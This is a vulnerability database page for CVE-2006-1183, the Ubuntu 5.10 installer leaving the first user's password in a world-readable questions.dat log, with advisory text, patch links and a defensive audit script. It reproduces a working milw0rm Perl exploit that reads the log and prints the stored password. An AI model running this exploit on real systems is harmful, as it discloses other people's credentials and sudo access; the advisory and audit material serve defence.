CVE-2006-1183
CVSS 7.2
Published: 2006-03-13 07:18:00
Last revised: 2011-03-07 21:32:20

[Original] The Ubuntu 5.10 installer does not properly clear passwords from the installer log file (questions.dat), and leaves the log file with world-readable permissions, which allows local users to gain privileges.


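[CNNVD] Ubuntu Linux Local Installation Password Disclosure Vulnerability (CNNVD-200603-221)

        The Ubuntu 5.10 installer does not properly clear passwords from the installer log file (questions.dat) and leaves behind a world-readable log file, which allows local users to gain privileges.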

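- CVSS (Base Score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [Total information disclosure, exposing all system files]
Integrity impact: COMPLETE [System integrity can be completely compromised]
Availability impact: COMPLETE [May cause a complete system outage]
Attack complexity: LOW [Exploitation has no access restrictions]
Attack vector: LOCAL [Exploitation requires physical access or a local account]
Authentication: NONE [Exploitation requires no authentication]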

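- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links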

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1183
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1183
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-221
(Official data source) CNNVD

- Other Links and Resources

http://www.ubuntulinux.org/support/documentation/usn/usn-262-1
(PATCH)  UBUNTU  USN-262-1
https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606
(UNKNOWN)  CONFIRM  https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606
http://www.vupen.com/english/advisories/2006/0927
(UNKNOWN)  VUPEN  ADV-2006-0927
http://xforce.iss.net/xforce/xfdb/25170
(UNKNOWN)  XF  ubuntu-installer-password-disclosure(25170)
http://www.securityfocus.com/bid/17086
(UNKNOWN)  BID  17086
http://www.osvdb.org/23868
(UNKNOWN)  OSVDB  23868
http://securitytracker.com/id?1015761
(UNKNOWN)  SECTRACK  1015761
http://secunia.com/advisories/19200
(UNKNOWN)  SECUNIA  19200

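- Vulnerability Information

Ubuntu Linux Local Installation Password Disclosure Vulnerability
High risk  Design error
2006-03-13 00:00:00 2006-03-13 00:00:00
Local
        The Ubuntu 5.10 installer does not properly clear passwords from the installer log file (questions.dat) and leaves behind a world-readable log file, which allows local users to gain privileges.

- Advisories and Patches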

        The vendor has released an upgrade patch to fix this security issue. Patch download links:
        Ubuntu Ubuntu Linux 5.10 amd64
        Ubuntu initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
        Ubuntu login_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_amd64.deb
        Ubuntu login_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_i386.deb
        Ubuntu login_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu passwd_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_amd64.deb
        Ubuntu passwd_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_i386.deb
        Ubuntu passwd_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu Ubuntu Linux 5.10 powerpc
        Ubuntu initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
        Ubuntu login_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_amd64.deb
        Ubuntu login_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_i386.deb
        Ubuntu login_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu passwd_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_amd64.deb
        Ubuntu passwd_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_i386.deb
        Ubuntu passwd_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu Ubuntu Linux 5.10 i386
        Ubuntu initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
        Ubuntu login_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_amd64.deb
        Ubuntu login_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_i386.deb
        Ubuntu login_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu passwd_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_amd64.deb
        Ubuntu passwd_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_i386.deb
        Ubuntu passwd_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_powerpc.deb
        

- Vulnerability Information (1579)

Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability (EDBID:1579)
linux local
2006-03-12 Verified
0 Kristian Hermansen
N/A
#!/usr/bin/perl -w

use warnings;
use strict;

##############################################################################
# Author: Kristian Hermansen
# Date: 3/12/2006
# Overview: Ubuntu Breezy stores the installation password in plain text
# Link: https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606
##############################################################################

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "Kristian Hermansen's 'Eazy Breezy' Password Recovery Tool\n";
print "99% effective, thank your local admin ;-)\n";
print "FOR EDUCATIONAL PURPOSES ONLY!!!\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";

# the two vulnerable files
my $file1 = "/var/log/installer/cdebconf/questions.dat";
my $file2 = "/var/log/debian-installer/cdebconf/questions.dat";

print "Checking if an exploitable file exists...";
if ( (-e $file1) || (-e $file2) )
{ 
  print "Yes\nNow checking if readable...";
  if ( -r $file1 )
  {
    getinfo($file1);
  }
  else
  {
    if ( -r $file2 ) {
      getinfo($file2);
    }
    else {
      print "No\nAdmin may have changed the permissions on the files :-(\nExiting...\n";
      exit(-2);
    }
  }
}
else
{
  print "No\nFile may have been deleted by the administrator :-(\nExiting...\n";
  exit(-1);
}

sub getinfo {
  my $fn = shift;
  print "Yes\nHere come the details...\n\n";
  my $realname = `grep -A 1 "Template: passwd/user-fullname" $fn | grep "Value: " | sed 's/Value: //'`;
  my $user = `grep -A 1 "Template: passwd/username" $fn | grep "Value: " | sed 's/Value: //'`;
  my $pass = `grep -A 1 "Template: passwd/user-password-again" $fn | grep "Value: " | sed 's/Value: //'`;
  chomp($realname);
  chomp($user);
  chomp($pass);
  print "Real Name: $realname\n";
  print "Username: $user\n";
  print "Password: $pass\n";
}

# milw0rm.com [2006-03-12]
		

- Vulnerability Information

23868
Ubuntu Installer Log File Cleartext Password Disclosure
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public, Exploit Commercial

- Vulnerability Description

The Ubuntu installer contains a flaw that may lead to an unauthorized password exposure. The installer log files fail to sanitize passwords used during the installation. The installer log files are world-readable, thus any local user can see the password of the first user account, which has full sudo privileges by default, thus leading to a loss of confidentiality.

- Timeline

2006-03-12 Unknown
2006-03-12 Unknown

- Solution

Upgrade package base-config to version 2.67ubuntu20 and passwd to version 1:4.0.3-37ubuntu8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author

- Vulnerability Information

Ubuntu Linux Local Installation Password Disclosure Vulnerability
Design Error 17086
No Yes
2006-03-12 12:00:00 2007-11-01 07:36:00
Discovered by Karl

- Affected Program Versions

Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64

- Vulnerability Discussion

Ubuntu Linux is prone to a local password-disclosure vulnerability because the installation system improperly stores clear-text passwords in world-readable files.

Exploiting this issue allows local attackers to access the user account that was created during the initial installation of Ubuntu. Since this user is granted 'sudo' access to the superuser account, this potentially allows local attackers to completely compromise affected computers.
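
A defender-side check for the condition described above, added here as an example (not part of the advisory or of the script reproduced on this page): it reports whether an installer log still holds a password value and is world-readable, without printing the value. The blank-line separated `Key: value` stanza layout and the `write_sample` helper are assumptions; the default paths are the two named on this page.

```sh
#!/bin/sh
# Added audit example, not from the advisory or the exploit author.
# Status per file (stored values are never printed):
#   MISSING / UNREADABLE  nothing to inspect
#   CLEAN       no passwd/*password* question holds a value
#   RESTRICTED  a password value is stored, file is not world-readable
#   EXPOSED     a password value is stored and the file is world-readable
audit_questions_dat() {
    f=$1
    [ -f "$f" ] || { echo "MISSING $f"; return 0; }
    [ -r "$f" ] || { echo "UNREADABLE $f"; return 0; }
    # Stanzas are blank-line separated "Key: value" lines (assumed layout,
    # matching the Template:/Value: lines the script on this page greps for).
    hits=$(awk 'BEGIN { RS = ""; FS = "\n" }
        {
            tmpl = ""; val = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^Template: /) tmpl = substr($i, 11)
                if ($i ~ /^Value: /)    val  = substr($i, 8)
            }
            if (tmpl ~ /^passwd\/.*password/ && val != "") n++
        }
        END { print n + 0 }' "$f")
    if [ "$hits" -eq 0 ]; then
        echo "CLEAN $f"
    elif [ -n "$(find "$f" -prune -perm -004)" ]; then
        echo "EXPOSED $f"
    else
        echo "RESTRICTED $f"
    fi
}

# Constructed sample in the assumed layout, for trying the check offline.
write_sample() {
    printf '%s\n' 'Name: passwd/username' 'Template: passwd/username' \
        'Value: alice' '' 'Name: passwd/user-password-again' \
        'Template: passwd/user-password-again' "Value: $2" > "$1"
}

# Default to the two log paths named on this page.
[ $# -gt 0 ] || set -- /var/log/installer/cdebconf/questions.dat \
                       /var/log/debian-installer/cdebconf/questions.dat
for p in "$@"; do audit_questions_dat "$p"; done
```

A file reported as RESTRICTED still stores the value in clear text; only its permissions differ from the EXPOSED case.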

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- Solution

The vendor has released an advisory along with fixes to address this issue. Please see the advisory for more information.


Ubuntu Ubuntu Linux 5.10 amd64

Ubuntu Ubuntu Linux 5.10 powerpc

Ubuntu Ubuntu Linux 5.10 i386

- Related References

 

 
